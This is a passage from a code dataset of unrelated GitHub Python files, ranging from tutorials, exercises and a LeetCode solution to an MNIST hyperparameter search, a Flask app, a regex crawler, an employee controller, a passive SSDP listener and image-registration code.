hexSide()\n s.transform = Matrix.rotateY(i*math.pi/3)\n hexagon.addChild(s)\n\n shapes = [hexagon]\n lights = [Light(Tuple.point(-10, 10, -10), Color(1, 1, 1))]\n\n w = World(lights, shapes)\n\n c = Camera(100, 50, math.pi/3)\n c.transform = Matrix.viewTransformation(\n Tuple.point(0, 1.5, -5),\n Tuple.point(0, 1, 0),\n Tuple.vector(0, 1, 0)\n )\n\n image = c.render(w)\n image.saveImage(\"image5\")\n","repo_name":"YufeiLinUlysses/LearnDataScience","sub_path":"Getting Started/SimpleProject/Backend/src/methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":5100,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"33828088459","text":"# ---------------------------------------- The Zip Function ----------------------------------------\nnames = ['bulbasaur', 'charmander', 'squirtle']\nhps = [45, 39, 44]\n\n# example of non-pythonic combining objects ----------------------------------------\ncombined = []\n\nfor i, pokemon in enumerate(names):\n combined.append((pokemon, hps[i]))\n\nprint(f'non-pythonic combining objects: {combined}')\n\n# example of pythonic combining objects ----------------------------------------\ncombined_zip = zip(names, hps)\ncombined_zip_list = [*combined_zip]\n\nprint(f'pythonic combining objects: {combined}')\n\n# ---------------------------------------- The Collections Module ----------------------------------------\n# namedtuple: tuple subclasses with named field\n# deque: list-like container with fast appends and pops\n# Counter: dict for counting hashable objects\n# OrderedDict: dict that retains order of entries\n# defaultdict: dict that calls a factory function to supply missing values\n\npoke_types = ['grass', 'dark', 'fire', 'fire']\n\n# example of non-pythonic counting ----------------------------------------\ntype_counts = {}\n\nfor poke_type in poke_types:\n if poke_type in type_counts:\n type_counts[poke_type] += 1\n else:\n type_counts[poke_type] = 1\n\nprint(f'non-pythonic counting: {type_counts}')\n\n# example of pythonic counting ----------------------------------------\nfrom collections import Counter\n\ncount_poke = Counter(poke_types)\nprint(f'pythonic counting: {count_poke}')\n\n# ---------------------------------------- The Itertools Module ----------------------------------------\n# infinite iterators: count, cycle, repeat\n# finite iterators: accumulate, chain, zip_longest, etc\n# combination generators: product, permutations, combinations\n\npoke_types = ['bug', 'fire', 'ghost', 'grass', 'water']\n\n# example of non-pythonic combinations ----------------------------------------\ncombos = []\n\nfor x in poke_types:\n for y in poke_types:\n if x == y:\n continue\n if ((x,y) not in combos) and ((y,x) not in combos):\n combos.append((x,y))\nprint(f'non-pythonic combinations: {combos}')\n\n# example of pythonic combinations ----------------------------------------\nfrom itertools import combinations\n\ncombos_obj = combinations(poke_types, 2)\ncombos_obj_list = [*combos_obj]\n\nprint(f'pythonic combinations: {combos_obj_list}')\n\n# ---------------------------------------- The Set Type ----------------------------------------\n# set datatype has following methods:\n# intersection(): all elements that are in both sets\n# difference(): all elements in one set but not the other\n# symmetric_difference(): all elements in exactly one set\n# union(): all elements that are in either set\n\nlist_a = ['bulbasaur', 'charmander', 'squirtle']\nlist_b = ['caterpie', 'pidgey', 'squirtle']\n\n# example of non-pythonic way to find elements that exist in both lists ----------------------------------------\nin_common = []\n\nfor pokemon_a in list_a:\n for pokemon_b in list_b:\n if pokemon_a == pokemon_b:\n in_common.append(pokemon_a)\n \nprint(f'non-pythonic way to find elements exist in both lists: {in_common}')\n\n# example of pythonic way to find elements that exist in both lists ----------------------------------------\nset_a = set(list_a)\nset_b = set(list_b)\n\nintersect = set_a.intersection(set_b)\nintersect_list = [*intersect]\n\nprint(f'pythonic way to find elements exist in both lists: {intersect_list}')\n\n# example of pythonic way to find elements that exist in one list but not in other ----------------------------------------\nset_a = set(list_a)\nset_b = set(list_b)\n\ndifference = set_a.difference(set_b)\ndifference_list = [*difference]\n\nprint(f'pythonic way to find elements exist in one list but not in other list: {difference_list}')\n\n# example of pythonic way to find elements that exist in exactly one list and not both ----------------------------------------\nset_a = set(list_a)\nset_b = set(list_b)\n\nsymmetric_difference = set_a.symmetric_difference(set_b)\nsymmetric_difference_list = [*symmetric_difference]\n\nprint(f'pythonic way to find elements exist in exactly one list and not both: {symmetric_difference_list}')\n\n# example of pythonic way to collect all unique elements that appear in either or both lists ----------------------------------------\nset_a = set(list_a)\nset_b = set(list_b)\n\nunion = set_a.union(set_b)\nunion_list = [*union]\n\nprint(f'pythonic way to collect all unique elements that appear in either or both lists: {union_list}')\n\n# ---------------------------------------- Eliminate Loops ----------------------------------------\npoke_stats = [\n [90, 92, 75, 60],\n [25, 20, 15, 90],\n [65, 130, 60, 75]\n]\n\n# example of non-pythonic way to sum row ----------------------------------------\ntotals = []\nfor row in poke_stats:\n totals.append(sum(row))\n\nprint(f'non-pythonic way to sum row: {totals}')\n\n# example of using list comprehension way to sum row ----------------------------------------\ntotals_comp = [sum(row) for row in poke_stats]\n\nprint(f'using list comprehension way to sum row: {totals}')\n\n# example of using map in list comprehension to sum row ----------------------------------------\ntotals_sum = [*map(sum, poke_stats)]\n\nprint(f'using map in list comprehension to sum row: {totals}')\n\n# ----------------------------------------\n\n# example of using map in list comprehension to find mean row ----------------------------------------\nimport statistics\n\nmean_sum = [*map(statistics.mean, poke_stats)]\n\nprint(f'using map in list comprehension to find mean row: {mean_sum}')\n\n# example of using numpy and list comprehension to find mean row ----------------------------------------\nimport numpy as np\n\npoke_stats_np = np.array(poke_stats)\nmean_np = [np.mean(row) for row in poke_stats_np]\nmean_np_list = [*mean_np]\n\nprint(f'using numpy & list comprehension to find mean row: {mean_np_list}')\n\n# example of using numpy and axis to find mean row ----------------------------------------\nimport numpy as np\n\npoke_stats_np = np.array(poke_stats)\nmean_simple_np = poke_stats_np.mean(axis=1)\nmean_simple_np_list = [*mean_simple_np]\n\nprint(f'using numpy and axis to find mean row: {mean_simple_np_list}')","repo_name":"firdausraginda/python-efficient-code","sub_path":"writing-efficient-python/gaining-efficiencies.py","file_name":"gaining-efficiencies.py","file_ext":"py","file_size_in_byte":6207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29434855903","text":"count = 0\ntotal = 0\n\nfilename = input('Enter filename:> ')\n\ntry:\n contents = open(filename)\n \nexcept:\n if filename == 'na na boo boo':\n print(\"Fuck You!\")\n quit()\n else:\n print('File not found', filename)\n quit()\n \n\nfor line in contents:\n if line.startswith('X-DSPAM-Confidence:'): \n count = count + 1\n #print(count)\n pos = line.find(':')\n #print(pos)\n number = float(line[pos + 1:].strip())\n #print(number)\n total = total + number\n #print(total)\nprint('Count is:> ',count)\nprint('Total is:> ',total)\n \nave = total/count\nprint('Average Spam Confidence is:>',ave)\n \n\n\n\n \n","repo_name":"Curva-Tech/Py4E","sub_path":"pyfor/ex7.2.py","file_name":"ex7.2.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42204982618","text":"class Solution:\n def minimumTime(self, time: List[int], totalTrips: int) -> int:\n minimum , maximum = 1 , min(time) * totalTrips\n while minimum < maximum:\n mid = (minimum + maximum) // 2\n current_time = 0\n for i in range(len(time)):\n current_time = current_time + mid // time[i]\n if current_time >= totalTrips:\n maximum = mid\n else:\n minimum = mid + 1\n return minimum\n\t\t","repo_name":"harshita1611/leet_code","sub_path":"my-folder/problems/minimum_time_to_complete_trips/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"32513251424","text":"# -*- coding: utf-8 -*-\n\nfrom BO.bayesian_optimization import BayesianOptimization\n\nimport sys\nfrom collections import OrderedDict\nimport numpy as np\nimport tensorflow as tf\n\n# data mnist\nfrom mnist_data.mnist import download_mnist, load_mnist, key_file\ndownload_mnist()\nX_train = load_mnist(key_file[\"train_img\"])[8:, :]\nX_test = load_mnist(key_file[\"test_img\"], )[8:,:]\ny_train = load_mnist(key_file[\"train_label\"], 1)\ny_test = load_mnist(key_file[\"test_label\"], 1)\n\n\n# 目的関数(ハイパーパラメータを引数にする関数)\ndef MLP(alpha, lr, layer1, layer2, layer3):\n X = tf.placeholder(tf.float32, [None, 784])\n label = tf.placeholder(tf.int32, [None, ])\n y_ = tf.one_hot(label, depth=10, dtype=tf.float32)\n\n w_0 = tf.Variable(tf.random_normal([784, int(layer1)], mean=0.0, stddev=0.05))\n b_0 = tf.Variable(tf.zeros([int(layer1)]))\n h_0 = tf.sigmoid(tf.matmul(X, w_0) + b_0)\n\n w_1 = tf.Variable(tf.random_normal([int(layer1), int(layer2)], mean=0.0, stddev=0.05))\n b_1 = tf.Variable(tf.zeros([int(layer2)]))\n h_1 = tf.sigmoid(tf.matmul(h_0, w_1) + b_1)\n\n w_2 = tf.Variable(tf.random_normal([int(layer2), int(layer3)], mean=0.0, stddev=0.05))\n b_2 = tf.Variable(tf.zeros([int(layer3)]))\n h_2 = tf.sigmoid(tf.matmul(h_1, w_2) + b_2)\n\n w_o = tf.Variable(tf.random_normal([int(layer3), 10], mean=0.0, stddev=0.05))\n b_o = tf.Variable(tf.zeros([10]))\n y = tf.nn.softmax(tf.matmul(h_2, w_o) + b_o)\n\n cross_entropy = -tf.reduce_sum(y_ * tf.log(y))\n\n L2_sqr = tf.nn.l2_loss(w_0) + tf.nn.l2_loss(w_1) + tf.nn.l2_loss(w_2)\n\n loss = cross_entropy + alpha * L2_sqr\n train_step = tf.train.GradientDescentOptimizer(lr).minimize(loss)\n\n correct_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\n\n init = tf.initialize_all_variables()\n with tf.Session() as sess:\n sess.run(init)\n print(\"Training...\")\n for i in range(20000):\n #batch_x, batch_y = X_train[(50*i):(50*(i+1)),:], y_train[(50*i):(50*(i+1)),0]\n batch_index = np.random.choice(X_train.shape[0], 50, replace=False)\n batch_x = X_train[batch_index, :]\n batch_y = y_train[batch_index, 0]\n\n train_step.run({X: batch_x, label: batch_y})\n if i % 2000==0:\n train_accuracy = accuracy.eval({X: batch_x, label: batch_y})\n #print(\" %6d %6.3f\" % (i, train_accuracy))\n accuracy = accuracy.eval({X: X_test, label: y_test[:,0]})\n print(\"accuracy %6.3f\" % accuracy)\n return accuracy\n\ndef main(k_num, acq, verbose=True):\n gp_params = {\"alpha\": 1e-5}\n\n # ハイパーパラメータの範囲を指定\n BO = BayesianOptimization(MLP,\n {\"alpha\": (1e-8, 1e-4), \"lr\": (1e-6, 1e-2),\n \"layer1\": (10, 100),\"layer2\": (10, 100),\"layer3\": (10, 100)},\n verbose=verbose, kernel_num = k_num)\n\n BO.explore({\"alpha\": [1e-8, 1e-8, 1e-4, 1e-4],\"lr\": [1e-6, 1e-2, 1e-6, 1e-2],\n \"layer1\": [10, 50, 100, 50], \"layer2\": [10, 50, 100, 50],\"layer3\": [10, 50, 100, 50]})\n\n BO.maximize(n_iter=200, acq=acq, **gp_params)\n\n print(\"-\"*53)\n print(\"Final Results\")\n print(\"kernel: {}\".format(str(BO.kernel)))\n print(\"acquisition function: {}\".format(BO.acquisition))\n\n print(\"score: {}\".format(BO.res[\"max\"][\"max_val\"]))\n print(\"best_parameter: \")\n print(BO.res[\"max\"][\"max_params\"])\n print(\"-\"*53)\n\nif __name__ == \"__main__\":\n main(0, \"ucb\")\n # kernel function\n # 0: Matern(nu=0.5)\n # 1: Matern(nu=1.5)\n # 2: Matern(nu=2.5)\n # 3: RBF\n # bayesian_optimization.pyにて追加、変更、可能\n # acquisition function\n # ucb\n # ei\n # poi\n # helpers.pyにて追加可能\n","repo_name":"yonedahayato/BayesianOptimization_WithTF","sub_path":"execute.py","file_name":"execute.py","file_ext":"py","file_size_in_byte":3857,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"974029003","text":"from flask import Flask\n\nfrom models import db\nfrom routes.routesFront import routes\nfrom routes.routesApi import apiRoutes\nimport os\n\n\n# we use sqlaclhemy and sqlite since it's easier to configure\n\n\n# we could use blueorints to separate the logice here but its a simple small application\n# we create the data model the we will store\ndef create_app():\n app = Flask(__name__)\n app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0\n app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///data.db'\n db.init_app(app)\n app.register_blueprint(routes)\n app.register_blueprint(apiRoutes,url_prefix='/api')\n return app\n\n\ndef setup_database(app):\n with app.app_context():\n db.create_all()\n db.session.commit()\n\n\n\nif __name__ == '__main__':\n app = create_app()\n if not os.path.isfile('data.db'):\n setup_database(app)\n app.run()\n","repo_name":"Anas02200/SsenseAiTask","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41552504154","text":"from pathlib import Path\nimport requests\nfrom urllib.parse import quote\nimport json\nimport re\nfrom reanalogy import data_path\n\nimport pandas as pd\n\nimport joblib\nimport time\n\nDF_FILE_NAME = \"crawled_regex.pk\"\nAPI_TOKEN = \"xxxxx\"\n\n\nmem = joblib.Memory(Path.home().joinpath(\".cache\"), verbose=0)\n\n\nSEARCH_TERM = [\n \"re.compile\",\n \"re.match\",\n \"re.fullmatch\",\n \"re.split\",\n \"re.search\",\n \"re.findall\",\n \"re.finditer\",\n \"re.sub\",\n \"re.subn\",\n \"re.escape\",\n \"re.purge\",\n]\n\n\ndef init_df():\n search_params = []\n\n for q in SEARCH_TERM:\n for i in range(1, 30):\n search_params.append({\"q\": quote(q), \"page\": i, \"fragments\": None})\n df = pd.DataFrame(search_params)\n\n return df\n\n\ndef load_df(root_path: Path):\n p = root_path.joinpath(DF_FILE_NAME)\n if p.exists():\n return pd.read_pickle(p)\n else:\n df = init_df()\n save_df(root_path, df)\n return df\n\n\ndef save_df(root_path: Path, df: pd.DataFrame):\n df.to_pickle(root_path.joinpath(DF_FILE_NAME))\n\n\ndef parse_fragments(q, fragments):\n patterns = []\n if fragments is None:\n return None\n for delimeter in ['\"', \"'\", '\"\"\"']:\n for f in re.findall(\n f\"{q}\\(r*{delimeter}[^{delimeter}]*{delimeter} *[,\\)a-zA-Z\\\"']\", fragments\n ):\n # regex_dataset.append(f)\n try:\n raw_regex = re.sub(f\"{q}\\(r*{delimeter}\", \"\", f[: -len(delimeter) - 1])\n re.compile(raw_regex)\n patterns.append(raw_regex)\n except Exception as e:\n # print(f\"error: {f} -> {raw_regex}\")\n print(e)\n if len(patterns):\n\n return patterns\n else:\n return None\n\n\n\ndef make_regex_dataset(root_path: Path):\n\n headers = {\n \"Accept\": \"application/vnd.github.text-match+json\",\n \"Authorization\": f\"Bearer {API_TOKEN}\",\n \"X-GitHub-Api-Version\": \"2022-11-28\",\n }\n df = None\n while df is None or df.fragments.apply(lambda x: x is None).sum() > 0:\n df = load_df(root_path)\n regex_dataset = []\n for row in df.itertuples():\n if row.fragments is not None:\n continue\n params = {\"q\": row.q, \"page\": row.page}\n response = requests.get(\n \"https://api.github.com/search/code\", params=params, headers=headers\n )\n if response.status_code == 422:\n df.loc[row.Index, \"fragments\"] = str(response.text)\n continue\n elif response.status_code == 403:\n print(response.text)\n limit_reset = time.strftime(\n \"%Y-%m-%d %H:%M:%S\",\n time.localtime(int(response.headers[\"X-RateLimit-Reset\"])),\n )\n seconds = int(response.headers[\"X-RateLimit-Reset\"]) - time.time() + 5\n print(f\"Sleeping for {seconds} until: {limit_reset}\")\n time.sleep(seconds if seconds > 0 else 60)\n continue\n if response.status_code != 200:\n currently_done = df.fragments.apply(lambda x: x is not None).mean()\n print(f\"progress: {currently_done:.2f}\")\n time.sleep(60)\n continue\n fragments = [\n match[\"fragment\"]\n for item in json.loads(response.text)[\"items\"]\n for match in item[\"text_matches\"]\n ]\n df.loc[row.Index, \"fragments\"] = str(fragments)\n save_df(root_path, df)\n return df\n\n\nif __name__ == \"__main__\":\n make_regex_dataset(data_path)\n","repo_name":"fostiropoulos/ReAnalogy","sub_path":"reanalogy/curation/crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":3626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"30639532054","text":"from http import HTTPStatus\nfrom sqlalchemy.sql import case, func, or_\nfrom sqlalchemy.orm import aliased\nfrom typing import List, Optional, Tuple\nfrom traceback import format_exc\n\nfrom eproc import error_logger\nfrom eproc.models.auth.users_roles import UserRole\nfrom eproc.models.companies.branches import Branch\nfrom eproc.models.companies.departments import Department\nfrom eproc.models.companies.directorates import Directorate\nfrom eproc.models.companies.divisions import Division\nfrom eproc.models.users.employees import Employee\nfrom eproc.schemas.users.employees import (\n EmployeeAutoSchema,\n EmployeeDetailSchema,\n)\n\n\nclass EmployeeController:\n def __init__(self):\n self.schema = EmployeeAutoSchema()\n self.many_schema = EmployeeAutoSchema(many=True)\n self.detail_schema = EmployeeDetailSchema()\n \n def get_detail(self, id: str) -> Tuple[HTTPStatus, str, Optional[dict]]:\n try:\n FirstApprover = aliased(Employee)\n SecondApprover = aliased(Employee)\n ThirdApprover = aliased(Employee)\n\n is_registered = (\n case(\n (func.count(UserRole.role_id) > 0, True),\n else_=False\n ).label(\"is_registered\")\n )\n\n employee: Employee = (\n Employee.query\n .with_entities(\n Employee.id,\n Employee.full_name,\n Employee.email,\n Employee.phone_number,\n Employee.branch_id,\n Branch.description.label(\"branch_name\"),\n Employee.directorate_id,\n Directorate.description.label(\"directorate_name\"),\n Employee.division_id,\n Division.description.label(\"division_name\"),\n Employee.department_id,\n Department.description.label(\"department_name\"),\n FirstApprover.id.label(\"first_approver_id\"),\n FirstApprover.full_name.label(\"first_approver_full_name\"),\n FirstApprover.is_active.label(\"first_approver_is_active\"),\n SecondApprover.id.label(\"second_approver_id\"),\n SecondApprover.full_name.label(\"second_approver_full_name\"),\n SecondApprover.is_active.label(\"second_approver_is_active\"),\n ThirdApprover.id.label(\"third_approver_id\"),\n ThirdApprover.full_name.label(\"third_approver_full_name\"),\n ThirdApprover.is_active.label(\"third_approver_is_active\"),\n Employee.is_active,\n Employee.updated_at,\n Employee.updated_by,\n is_registered,\n )\n .outerjoin(FirstApprover, FirstApprover.id == Employee.first_approver_id)\n .outerjoin(SecondApprover, SecondApprover.id == Employee.second_approver_id) # TODO: FIX - if second_approver is null, then 404\n .outerjoin(ThirdApprover, ThirdApprover.id == Employee.third_approver_id)\n .join(Branch, Branch.id == Employee.branch_id)\n .join(Directorate, Directorate.id == Employee.directorate_id)\n .join(Division, Division.id == Employee.division_id)\n .join(Department, Department.id == Employee.department_id)\n .outerjoin(UserRole, UserRole.user_id == Employee.id)\n .filter(Employee.id == id)\n .filter(Employee.is_deleted.is_(False))\n .group_by(\n Employee.id,\n Branch.description,\n Directorate.description,\n Division.description,\n Department.description,\n FirstApprover.id,\n FirstApprover.full_name,\n FirstApprover.is_active,\n SecondApprover.id,\n SecondApprover.full_name,\n SecondApprover.is_active,\n ThirdApprover.id,\n ThirdApprover.full_name,\n ThirdApprover.is_active,\n )\n .first()\n )\n \n if not employee:\n return (\n HTTPStatus.NOT_FOUND,\n \"Pegawai tidak ditemukan.\",\n None\n )\n\n employee_data = self.detail_schema.dump(employee)\n\n return HTTPStatus.OK, \"Pegawai ditemukan.\", employee_data\n except Exception as e:\n error_logger.error(f\"Error on EmployeeController:get_detail() :: {e}, {format_exc()}\")\n return (\n HTTPStatus.INTERNAL_SERVER_ERROR,\n \"Terjadi kegagalan saat mengambil data pegawai.\",\n None\n )\n\n def get_list(\n self,\n **kwargs\n ) -> Tuple[HTTPStatus, str, List[Optional[dict]], int]:\n\n id_list: List[str] = kwargs.get(\"id_list\")\n entity_id: str = kwargs.get(\"entity_id\")\n search_query: str = kwargs.get(\"search_query\").strip()\n limit: Optional[int] = kwargs.get(\"limit\")\n offset: int = kwargs.get(\"offset\")\n\n FirstApprover = aliased(Employee)\n\n employee_query = (\n Employee.query\n .with_entities(\n Employee.id,\n Employee.full_name,\n Employee.email,\n FirstApprover.full_name.label(\"first_approver_full_name\"),\n Employee.is_active,\n Employee.updated_at,\n Employee.updated_by,\n )\n .join(FirstApprover, FirstApprover.id == Employee.first_approver_id)\n .filter(Employee.is_deleted.is_(False))\n )\n\n if id_list:\n employee_query = employee_query.filter(Employee.id.in_(id_list))\n \n if entity_id:\n employee_query = employee_query.filter(Employee.entity_id == entity_id)\n \n if search_query:\n employee_query = (\n employee_query\n .filter(or_(\n Employee.id.ilike(f\"%{search_query}%\"),\n Employee.full_name.ilike(f\"%{search_query}%\"),\n ))\n )\n \n total = employee_query.count()\n \n if limit:\n employee_query = employee_query.limit(limit)\n\n if offset > 0:\n employee_query = employee_query.offset(offset)\n \n employee_list: List[Employee] = employee_query.all()\n\n if not employee_list:\n return (\n HTTPStatus.NOT_FOUND,\n \"Pegawai tidak ditemukan.\",\n [],\n total\n )\n employee_data_list = self.many_schema.dump(employee_list)\n\n return (\n HTTPStatus.OK,\n \"Pegawai ditemukan.\",\n employee_data_list,\n total\n )\n","repo_name":"keyinvoker/svc-procurement","sub_path":"eproc/controllers/employee.py","file_name":"employee.py","file_ext":"py","file_size_in_byte":7011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16728070557","text":"# SSDP passive Sniffer\n# scanns the Lan for SSDP notify packets and shows the information\n# in a Tree (it will show Location , Devices , Services)\n#\n# it does not need root privilges to run\n#\n# Created by Fabian (Islidius)\n#\n# TODO:\n# - Scroll Pane\n# - making the parser safe\n\n\nimport socket,struct\nfrom thread import start_new_thread,allocate_lock\nfrom Tkinter import *\nimport ttk\n\nMCAST_GRP = '239.255.255.250'\nMCAST_PORT = 1900\n\nrecord = {}\ntrec = {}\n\nrunning = True\nrunninglock = allocate_lock()\n\ndef parseFields(lines,out): # making key value pairs\n for l in lines:\n if not l == \"\":\n if l.count(\":\") >= 1:\n com,arg = l.split(\":\",1)\n out[1][com.lower()] = arg.lstrip()\n\ndef parsePacket(s): # parse a complete packet\n lines = s.split(\"\\n\")\n if lines[0].startswith(\"M-SEARCH\"):\n out = (\"search\",{})\n elif lines[0].startswith(\"NOTIFY\"):\n out = (\"notify\",{})\n\n parseFields(lines[1:],out)\n \n return out\n\n\ndef parseNTurn(urn):\n diff = urn.split(\":\")\n return (\"urn\",diff[len(diff) - 3],diff[len(diff) - 2])\n\ndef parseNTuuid(uuid):\n diff = uuid.split(\":\")\n return (\"uuid\",diff[len(diff) - 2],diff[len(diff) - 1])\n\ndef parseNTupnp(upnp):\n return (\"upnp\",\"rootdevice\")\n\ndef parseNT(nt): # parse the NT field\n if nt.startswith(\"urn\"):\n return parseNTurn(nt)\n elif nt.startswith(\"uuid\"):\n return parseNTuuid(nt)\n elif nt.startswith(\"upnp\"):\n return parseNTupnp(nt)\n else:\n return \"FAIL\"\n\ndef getuuid(packet): # extract uuid form usn\n return packet[1][\"usn\"].split(\":\")[1].rstrip()\n\n\ndef listen(): # listen and add to tree\n global record,runninglock\n while True:\n s = sock.recv(10240)\n packet = parsePacket(s)\n if packet[0] == \"notify\": # only parse notify packets\n uuid = getuuid(packet)\n if not uuid in record.keys(): # first time this uuid\n record[uuid] = {} # needed for further features\n record[uuid][\"device\"] = [] \n record[uuid][\"service\"] = []\n record[uuid][\"location\"] = packet[1][\"location\"]\n\n i = tree.insert(\"\",\"end\",text = uuid) # build the tree\n tree.insert(i,\"end\",text = \"Location: \" + packet[1][\"location\"])\n d = tree.insert(i,\"end\",text = \"device\")\n s = tree.insert(i,\"end\",text = \"service\")\n\n trec[uuid] = {} # safe link to the tree\n trec[uuid][\"device\"] = d\n trec[uuid][\"service\"] = s\n \n nt = parseNT(packet[1][\"nt\"])\n\n if nt[0] == \"urn\": # only parse urn\n if not nt[2] in record[uuid][nt[1]]: # eliminate doubles\n tree.insert(trec[uuid][nt[1]],\"end\",text = nt[2])\n record[uuid][nt[1]].append(nt[2])\n\n runninglock.acquire()\n if(not running): # check if closed\n break\n runninglock.release()\n \n runninglock.release()\n\n \ndef render(): # update loop\n tree.update()\n\n root.after(100,render)\n\ndef onClose(): #close window and thread\n global running,runninglock\n runninglock.acquire()\n running = False\n runninglock.release()\n root.destroy()\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\nsock.bind(('', MCAST_PORT))\n\nmreq = struct.pack(\"4sl\", socket.inet_aton(MCAST_GRP), socket.INADDR_ANY)\nsock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)\n\nroot = Tk()\nroot.wm_title(\"SSDP sniffer\")\nroot.protocol(\"WM_DELETE_WINDOW\",onClose)\n\ntree = ttk.Treeview()\ntree.pack(expand = True,fill = \"both\")\n\nstart_new_thread(listen,()) # start listen thread\nrender() # start update loop\n\nmainloop()\n","repo_name":"Islidius/pyNetworkTools","sub_path":"ssdp_sniffer.pyw","file_name":"ssdp_sniffer.pyw","file_ext":"pyw","file_size_in_byte":3748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5623032397","text":"from typing import Callable, Hashable\n\nimport numpy as np\nfrom skimage import morphology\nfrom pystackreg import StackReg\nfrom skimage.filters import sobel\nimport largestinteriorrectangle as lir\n\nfrom improc.experiment.types import Axis, Exposure, Image, MemoryImage, Timepoint, Vertex\nfrom improc.processes.types import ManyToOneTask, TaskError\n\nclass BadImageCantCrop(TaskError):\n ...\n\nclass Stack(ManyToOneTask):\n\n def __init__(self, registration_transform: Callable[[np.ndarray], np.ndarray] = sobel, register: bool = True, crop_output: bool = True, force_bad_reg: bool = False) -> None: # type: ignore\n super().__init__(\"stacked\", parallelism=1)\n self.crop_output = crop_output\n self.registration_transform = registration_transform\n self.force_bad_reg = force_bad_reg\n self.register = register\n\n def group_pred(self, image: Image) -> Hashable:\n return (image.get_tag(Vertex), image.get_tag(Exposure))\n\n def transform(self, images: list[Image]) -> Image:\n ordered = np.array([img.data for img in sorted(images, key=lambda x: x.get_tag(Timepoint).index)]) # type: ignore\n tags = list(filter(lambda x: not isinstance(x, Timepoint), images[0].tags))\n axes = [Axis.T] + images[0].axes\n if not self.register:\n return MemoryImage(ordered, axes, tags)\n\n sr = StackReg(StackReg.RIGID_BODY)\n reg_stack = np.array([self.registration_transform(img) for img in ordered])\n\n time_axis = sr._detect_time_axis(reg_stack)\n if time_axis != 0 and not self.force_bad_reg: # If the registration is gonna be garbage, don't bother\n print(f\"Bad registration for {images[0].vertex}; defaulting to stack w/o registration\")\n return MemoryImage(ordered, axes, tags)\n\n transforms = sr.register_stack(reg_stack, reference=\"previous\")\n stacked = sr.transform_stack(np.array(ordered), tmats=transforms)\n if self.crop_output:\n try:\n stacked = crop(stacked)\n except:\n raise Exception(f\"Can't crop image: {images[0]}\")\n return MemoryImage(stacked, axes, tags)\n\ndef crop(stack: np.ndarray) -> np.ndarray:\n\n min_poly = np.prod(stack != 0, axis=0)\n x1,y1,x2,y2 = lir.lir(min_poly.astype(bool))\n\n return stack[:, y1:y2, x1:x2]\n\ndef composite_stack(stacks: np.ndarray, tmats: np.ndarray) -> np.ndarray | None:\n assert stacks.ndim == 4\n\n sr = StackReg(StackReg.RIGID_BODY)\n stacked_cropped = np.array([crop(sr.transform_stack(stack, tmats=tmats)) for stack in stacks])\n return stacked_cropped\n","repo_name":"Barmada-Lab/lab-tools","sub_path":"improc/improc/processes/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12037226974","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport Apps.Perfil.models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('Perfil', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='UserConfig',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('plantilla', models.IntegerField(default=1, choices=[(1, b'Predeterminado'), (2, b'Clasico')])),\n ],\n ),\n migrations.AlterField(\n model_name='userprofile',\n name='avatar',\n field=models.ImageField(upload_to=Apps.Perfil.models.url),\n ),\n migrations.AlterField(\n model_name='userprofile',\n name='user',\n field=models.OneToOneField(related_name='profile', on_delete=models.CASCADE, to=settings.AUTH_USER_MODEL),\n ),\n migrations.AddField(\n model_name='userprofile',\n name='config',\n field=models.OneToOneField(null=True, on_delete=models.CASCADE, to='Perfil.UserConfig'),\n ),\n ]\n","repo_name":"Ezla/PVenta","sub_path":"Apps/Perfil/migrations/0002_auto_20151110_1438.py","file_name":"0002_auto_20151110_1438.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35696898705","text":"from matplotlib.pyplot import boxplot\nfrom utils.functions import box_xyxy_to_cxcywh, uniform_shape_masks\nfrom matplotlib import patches\nfrom utils import config\n\ndef visualize(f, axes_images, axes_masks, axes_pred, axes_target_masks, predicted, inputs, targets):\n\n class_predictions = predicted['class_predictions'].cpu().detach()\n bbox_predictions = predicted['bbox_predictions'].cpu().detach()\n segmentation_masks = predicted['segmentation_masks'].cpu().detach()\n\n batch_tensor_bhwc = inputs.rearrange(\"bs c h w -> bs h w c\")\n\n for im, ax, target in zip(batch_tensor_bhwc.data, axes_images, targets):\n im = im - im.min()\n im /= im.max()\n # im *= 255\n # print(im.min(), im.max())\n ax.set_xlim(0, im.shape[1])\n ax.set_ylim(im.shape[0], 0 )\n ax.imshow(im, origin=\"upper\")\n ax.set_title(\"id: {}\".format(target['image_id'].item()))\n\n for im, ax, class_probs, boxes, target in 